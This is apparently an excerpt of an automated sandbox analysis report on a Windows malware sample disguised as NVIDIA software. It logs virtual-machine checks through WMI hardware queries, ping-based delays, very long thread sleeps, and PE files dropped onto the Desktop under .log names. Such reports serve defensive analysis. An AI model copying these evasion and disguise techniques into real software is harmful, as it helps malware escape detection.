Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Memory allocated: 1560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Memory allocated: 1B480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1AA50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: AB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1A4C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1380000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1AFB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1AB50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 9B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1A580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1A790000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1A520000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1600000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1B3D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: E80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1AB60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 2960000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1AB90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 26F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Memory allocated: 1A8E0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HbFMikPW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AVNUZtIi.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OOMCloya.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NBjcEgcI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UCVIiXUm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fjyPCrNn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XOysNJXm.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TMLKnwYz.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PszJebvu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TxJtcnQc.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DaiMBcDs.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ShoatPdx.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hxRHxlcT.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zwfUdEOY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VAeASPIF.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JOqdsLLu.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DSPMVDWa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JesvDTTS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\chLhgIIs.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oSRflUSV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xYhnoKfH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JfykNhTG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pAbpDGmk.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\skLfaCLK.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TAxSAtpp.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AAjFTaDk.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\snUoPbCy.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CTevJfQr.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gzqzblNZ.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IyVKJmYP.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ukwwlbRt.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qiYwETGO.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IMSbQhuH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cjQhkVuX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BlhnJSvN.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LxmktYfY.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GwjbnDUU.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XwgSVREI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AOEnQqnj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DnVLkBOS.log	Jump to dropped file

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23841

Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe TID: 4564	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 1476	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 6204	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 1276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 2964	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 1488	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 6516	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 5964	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 2828	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 2228	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 320	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 3636	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 3276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 6720	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 4092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 4476	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 1268	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 4024	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 4080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 6768	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe TID: 2228	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\Conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
